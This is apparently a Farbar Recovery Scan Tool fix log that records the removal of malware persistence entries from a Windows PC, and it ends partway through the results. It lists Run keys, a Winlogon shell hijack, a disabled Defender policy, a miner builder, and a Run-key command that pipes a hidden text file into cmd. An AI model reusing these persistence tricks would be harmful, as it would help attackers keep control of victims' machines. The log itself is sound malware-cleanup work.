Fix result of Farbar Recovery Scan Tool (x64) Version: 24.10.2018
Ran by Betts (02-11-2018 13:52:35) Run:1
Running from C:\Users\Betts\Desktop
Loaded Profiles: Betts (Available Profiles: Betts)
Boot Mode: Normal
==============================================

fixlist content:
*****************
() C:\Users\Betts\AppData\Local\Temp\svchost.exe
C:\Users\Betts\AppData\Local\Temp\svchost.exe
HKLM\...\Run: [Autodesk Sync] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [csrss] => cmd /c type C:\Users\Betts\AppData\Local\Temp\csrss.txt | cmd <==== ATTENTION
C:\Users\Betts\AppData\Local\Temp\csrss.txt
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [6879fe793de5f826544fc9bd3b3ae212] => C:\ProgramData\audio.exe .. [285184 2018-08-22] (Microsoft Corporation) <==== ATTENTION
C:\ProgramData\audio.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\msanis.exe <==== ATTENTION
C:\ProgramData\msanis.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\MountPoints2: {7f7bd46c-632b-11e3-acad-c8600099836d} - F:\bootstrap.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Winlogon: [Shell] explorer.exe,"C:\Windows\SysWOW64\Windows Server\wserver.exe" <==== ATTENTION
C:\Windows\SysWOW64\Windows Server\wserver.exe
ShellExecuteHooks: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
ShellExecuteHooks-x32: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinUrl.url -> URL: file:///C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe
C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe [2018-08-22] ()
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe [2018-11-01] () <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
BHO: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
BHO-x32: No Name -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> No File
BHO-x32: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
Toolbar: HKLM - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
Toolbar: HKLM-x32 - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - No File
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\inspector@mozilla.org [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\netscape9migrator@flock.com [not found]
FF HKLM\...\Firefox\Extensions: [webrootsecure@webroot.com] - C:\ProgramData\WRData\PKG\FF_WEBEX => not found
FF HKLM-x32\...\Firefox\Extensions: [webrootsecurewebextensions@webroot.com] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer => not found
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [No File]
FF Plugin-x32: @kuaiyong.yrtd.com,version=1.0.1.1 -> C:\Program Files (x86)\kuaiyong\np_kyplugin.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-08-22] <==== ATTENTION
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooblpjoncpjmbncgocjlnannofkjjhnp
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 GGSAFERDriver; \??\C:\Program Files (x86)\Garena Plus\Room\safedrv.sys [X]
S3 gkernel; \??\C:\Users\Betts\AppData\Local\Temp\gkernel.sys [X] <==== ATTENTION
S0 hQjWNzqD; System32\drivers\hQjWNzqD.sys [X]
S0 kzeXHiXd; System32\drivers\kzeXHiXd.sys [X]
S2 memudrv; \??\D:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [X]
S0 pzLPPFej; System32\drivers\pzLPPFej.sys [X]
U0 SR; no ImagePath
U2 srservice; no ImagePath
2018-08-22 19:22 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\1.exe
2018-08-23 19:35 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\2.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000285184 ____H (Microsoft Corporation) C:\ProgramData\audio.exe
2018-08-22 20:32 - 2018-08-18 06:21 - 000603352 _____ (Alexander Roshal) C:\ProgramData\xhhjtiwtw.exe
2018-01-17 15:58 - 2018-01-17 19:17 - 001105920 _____ (Microsoft) C:\ProgramData\XMR Builder.exe
2018-10-03 00:56 - 2018-10-03 00:56 - 000000033 _____ () C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat
2016-08-13 10:40 - 2016-08-13 11:57 - 000002032 _____ () C:\Users\Betts\AppData\Roaming\droid4xinstaller.log
2018-01-18 23:28 - 2018-11-01 13:18 - 003344536 _____ () C:\Users\Betts\AppData\Roaming\msconfig.ini
2013-12-23 18:06 - 2016-03-25 22:32 - 000045270 _____ () C:\Users\Betts\AppData\Roaming\room_v3.dat
2017-03-25 22:55 - 2018-10-20 12:04 - 000000600 _____ () C:\Users\Betts\AppData\Roaming\winscp.rnd
2018-08-22 19:27 - 2018-08-22 19:27 - 000011568 _____ () C:\Users\Betts\AppData\Local\InstallationConfiguration.xml
2018-08-22 19:27 - 2018-08-22 19:27 - 000140800 _____ () C:\Users\Betts\AppData\Local\installer.dat
2018-06-12 22:24 - 2018-06-12 22:24 - 000004096 ____H () C:\Users\Betts\AppData\Local\keyfile3.drm
2018-10-27 08:05 - 2018-10-27 08:05 - 000000218 _____ () C:\Users\Betts\AppData\Local\recently-used.xbel
2017-12-07 19:22 - 2018-01-13 18:27 - 000007608 _____ () C:\Users\Betts\AppData\Local\Resmon.ResmonCfg
2018-08-22 19:27 - 2018-08-22 19:27 - 001413120 _____ () C:\Users\Betts\AppData\Local\sham.db
2014-08-31 10:30 - 2014-08-31 10:30 - 000000000 _____ () C:\Users\Betts\AppData\Local\{7018210F-C569-4660-8EC7-AF4BD353B0B6}
2017-11-15 18:57 - 2017-11-15 18:57 - 000000345 _____ () C:\Users\Betts\AppData\Local\~Report2.txt
C:\Users\Betts\AppData\Local\Temp\svchost.exe ..
C:\ProgramData\audio.exe ..
C:\Users\Betts\AppData\Roaming\msconfig.ini
2018-08-22 20:31 - 2018-08-22 20:31 - 000552448 _____ () C:\Users\Betts\AppData\Local\Temp\11AD.tmp.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 000495104 _____ () C:\Users\Betts\AppData\Local\Temp\1B4C.tmp.exe
2018-08-22 20:31 - 2018-08-22 20:31 - 000185104 _____ () C:\Users\Betts\AppData\Local\Temp\222.tmp.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 000079872 _____ () C:\Users\Betts\AppData\Local\Temp\23435.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163328 _____ () C:\Users\Betts\AppData\Local\Temp\2FA4.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000110592 _____ () C:\Users\Betts\AppData\Local\Temp\317.tmp.exe
2018-08-22 19:20 - 2018-08-22 19:26 - 000001020 _____ () C:\Users\Betts\AppData\Local\Temp\419204dddd.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 010522026 _____ () C:\Users\Betts\AppData\Local\Temp\allradio_4.27_portable.exe
2018-08-22 19:28 - 2018-08-22 19:29 - 001004032 _____ () C:\Users\Betts\AppData\Local\Temp\AmazonShoppingAssistant.exe
2018-08-22 19:26 - 2018-08-22 19:26 - 000020480 _____ (CatX) C:\Users\Betts\AppData\Local\Temp\cubesta.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 041735680 _____ (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\DBBC.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\F83D.tmp.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 004009147 _____ () C:\Users\Betts\AppData\Local\Temp\fag.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000622592 _____ (DianneLMeans@armyspy.com ) C:\Users\Betts\AppData\Local\Temp\fagw.exe
2018-04-29 14:05 - 2018-07-24 14:30 - 000450880 _____ (Garena Online ) C:\Users\Betts\AppData\Local\Temp\Garena.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000420191 _____ ( ) C:\Users\Betts\AppData\Local\Temp\global_installer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002291565 _____ (Godogic ) C:\Users\Betts\AppData\Local\Temp\JavaSetup_2179753812.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000176912 _____ () C:\Users\Betts\AppData\Local\Temp\ketup.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\KYlXSzGXn6oMeeHruwfwlWqCS.exe
2018-08-22 19:27 - 2018-08-22 21:10 - 000484352 _____ () C:\Users\Betts\AppData\Local\Temp\lame_enc.dll
2018-08-22 21:03 - 2018-08-21 04:01 - 000858912 _____ (Malwarebytes) C:\Users\Betts\AppData\Local\Temp\mb-clean.exe
2018-08-22 21:03 - 2018-08-22 21:00 - 082624400 _____ (Malwarebytes ) C:\Users\Betts\AppData\Local\Temp\mb3-setup-consumer-3.5.1.2522-1.0.421-1.0.6439.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 002951680 _____ (�Ludekolfoidgu kyosehicell ) C:\Users\Betts\AppData\Local\Temp\MediaPlay.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000181520 _____ () C:\Users\Betts\AppData\Local\Temp\merun.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000290304 _____ () C:\Users\Betts\AppData\Local\Temp\MPlayer1006.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000000000 _____ () C:\Users\Betts\AppData\Local\Temp\novol.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00000.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00001.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00002.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00003.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00004.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00005.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00006.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000343552 _____ () C:\Users\Betts\AppData\Local\Temp\RegOrganizer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002294272 _____ (TODO: <Company name>) C:\Users\Betts\AppData\Local\Temp\setup.exe
2018-08-22 19:27 - 2018-08-22 19:28 - 001323008 _____ (TigerTrade ) C:\Users\Betts\AppData\Local\Temp\sprun.exe
2018-10-06 21:04 - 2018-11-01 10:24 - 000169984 _____ () C:\Users\Betts\AppData\Local\Temp\svchost.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000339968 _____ () C:\Users\Betts\AppData\Local\Temp\TigerTrade.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000016384 _____ (Nicole R. Cosentino ) C:\Users\Betts\AppData\Local\Temp\tuna.exe
2018-10-07 15:22 - 2017-04-06 01:05 - 000134000 _____ () C:\Users\Betts\AppData\Local\Temp\Uninstall.exe
2018-05-09 07:29 - 2018-05-09 07:29 - 001130840 _____ (Google Inc.) C:\Users\Betts\AppData\Local\Temp\{E2831398-803C-4CAF-A96F-A6261E0523C5}-GoogleUpdateSetup.exe
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ContextMenuHandlers1: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers1-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers3: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => -> No File
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers4: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers5: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers6: [KyShellExt] -> {FB451ACC-65B5-456a-A84E-6F9B8B75B078} => -> No File
ContextMenuHandlers6-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
Task: {88D277A6-0226-4F8D-8001-20D332B2AA29} - System32\Tasks\Update\helpars => C:\Users\Betts\AppData\Roaming\System.exe <==== ATTENTION
C:\Users\Betts\AppData\Roaming\System.exe
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [133]
AlternateDataStreams: C:\Users\Betts\Cookies:Z9Vd5wjyCnrKb1R3FN3u9uOY [2266]
AlternateDataStreams: C:\Users\Betts\Local Settings:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Application Data:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Yl0t0Zf7okQM9:7Gt0kJJ90PbKkfYIBRyj [2158]
HKU\.DEFAULT\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\.DEFAULT\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION

*****************

[4140] C:\Users\Betts\AppData\Local\Temp\svchost.exe => process closed successfully.
C:\Users\Betts\AppData\Local\Temp\svchost.exe => moved successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\Autodesk Sync" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\svchost.exe" => removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => removed successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\csrss" => removed successfully
"C:\Users\Betts\AppData\Local\Temp\csrss.txt" => not found
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\6879fe793de5f826544fc9bd3b3ae212" => removed successfully
C:\ProgramData\audio.exe => moved successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\svchost.exe" => removed successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows\\Load" => removed successfully
"C:\ProgramData\msanis.exe" => not found
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7f7bd46c-632b-11e3-acad-c8600099836d} => removed successfully
HKLM\Software\Classes\CLSID\{7f7bd46c-632b-11e3-acad-c8600099836d} => not found
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" => removed successfully
Could not move "C:\Windows\SysWOW64\Windows Server\wserver.exe" => Scheduled to move on reboot.
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}" => removed successfully
HKLM\Software\Classes\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD} => not found
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}" => removed successfully
HKLM\SOFTWARE\WOW6432Node\Classes\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD} => not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinUrl.url => moved successfully
C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe => moved successfully
Could not move "C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe" => Scheduled to move on reboot.
Could not move "C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe" => Scheduled to move on reboot.
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe => moved successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe" => not found
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => removed successfully
HKLM\Software\Classes\CLSID\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{97ab88ef-346b-4179-a0b1-7445896547a5}" => removed successfully
HKLM\Software\Classes\CLSID\{97ab88ef-346b-4179-a0b1-7445896547a5} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{97ab88ef-346b-4179-a0b1-7445896547a5}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{97ab88ef-346b-4179-a0b1-7445896547a5} => not found
HKLM\Software\Classes\PROTOCOLS\Handler\mso-minsb-roaming.16 => removed successfully
HKLM\Software\Classes\CLSID\{83C25742-A9F7-49FB-9138-434302C88D07} => removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\mso-minsb.16 => removed successfully
HKLM\Software\Classes\CLSID\{42089D2D-912D-4018-9087-2B87803E93FB} => removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\skypec2c => removed successfully
HKLM\Software\Classes\CLSID\{91774881-D725-4E58-B298-07617B9B86A8} => not found
C:\Program Files (x86)\Netscape\Navigator 9\extensions\inspector@mozilla.org => path removed successfully
C:\Program Files (x86)\Netscape\Navigator 9\extensions\netscape9migrator@flock.com => path removed successfully
"HKLM\Software\Mozilla\Firefox\Extensions\\webrootsecure@webroot.com" => removed successfully
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\webrootsecurewebextensions@webroot.com" => removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0 => removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@kuaiyong.yrtd.com,version=1.0.1.1 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@t.garena.com/garenatalk => removed successfully
C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooblpjoncpjmbncgocjlnannofkjjhnp => moved successfully
HKLM\System\CurrentControlSet\Services\esgiguard => removed successfully
esgiguard => service removed successfully
HKLM\System\CurrentControlSet\Services\GGSAFERDriver => removed successfully
GGSAFERDriver => service removed successfully
HKLM\System\CurrentControlSet\Services\gkernel => removed successfully
gkernel => service removed successfully
HKLM\System\CurrentControlSet\Services\hQjWNzqD => removed successfully
hQjWNzqD => service removed successfully
HKLM\System\CurrentControlSet\Services\kzeXHiXd => removed successfully
kzeXHiXd => service removed successfully
HKLM\System\CurrentControlSet\Services\memudrv => removed successfully
memudrv => service removed successfully
HKLM\System\CurrentControlSet\Services\pzLPPFej => removed successfully
pzLPPFej => service removed successfully
HKLM\System\CurrentControlSet\Services\SR => removed successfully
SR => service removed successfully
HKLM\System\CurrentControlSet\Services\srservice => removed successfully
srservice => service removed successfully
C:\ProgramData\1.exe => moved successfully
C:\ProgramData\2.exe => moved successfully
"C:\ProgramData\audio.exe" => not found
C:\ProgramData\xhhjtiwtw.exe => moved successfully
C:\ProgramData\XMR Builder.exe => moved successfully
C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat => moved successfully
C:\Users\Betts\AppData\Roaming\droid4xinstaller.log => moved successfully
C:\Users\Betts\AppData\Roaming\msconfig.ini => moved successfully
C:\Users\Betts\AppData\Roaming\room_v3.dat => moved successfully
C:\Users\Betts\AppData\Roaming\winscp.rnd => moved successfully
C:\Users\Betts\AppData\Local\InstallationConfiguration.xml => moved successfully
C:\Users\Betts\AppData\Local\installer.dat => moved successfully
C:\Users\Betts\AppData\Local\keyfile3.drm => moved successfully
C:\Users\Betts\AppData\Local\recently-used.xbel => moved successfully
C:\Users\Betts\AppData\Local\Resmon.ResmonCfg => moved successfully
C:\Users\Betts\AppData\Local\sham.db => moved successfully
C:\Users\Betts\AppData\Local\{7018210F-C569-4660-8EC7-AF4BD353B0B6} => moved successfully
C:\Users\Betts\AppData\Local\~Report2.txt => moved successfully
"C:\Users\Betts\AppData\Local\Temp\svchost.exe .." => not found
"C:\ProgramData\audio.exe .." => not found
"C:\Users\Betts\AppData\Roaming\msconfig.ini" => not found
C:\Users\Betts\AppData\Local\Temp\11AD.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\1B4C.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\222.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\23435.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\2FA4.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\317.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\419204dddd.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\allradio_4.27_portable.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\AmazonShoppingAssistant.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\cubesta.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\DBBC.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\F83D.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\fag.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\fagw.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\Garena.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\global_installer.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\JavaSetup_2179753812.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ketup.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\KYlXSzGXn6oMeeHruwfwlWqCS.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\lame_enc.dll => moved successfully
C:\Users\Betts\AppData\Local\Temp\mb-clean.exe => moved successfully
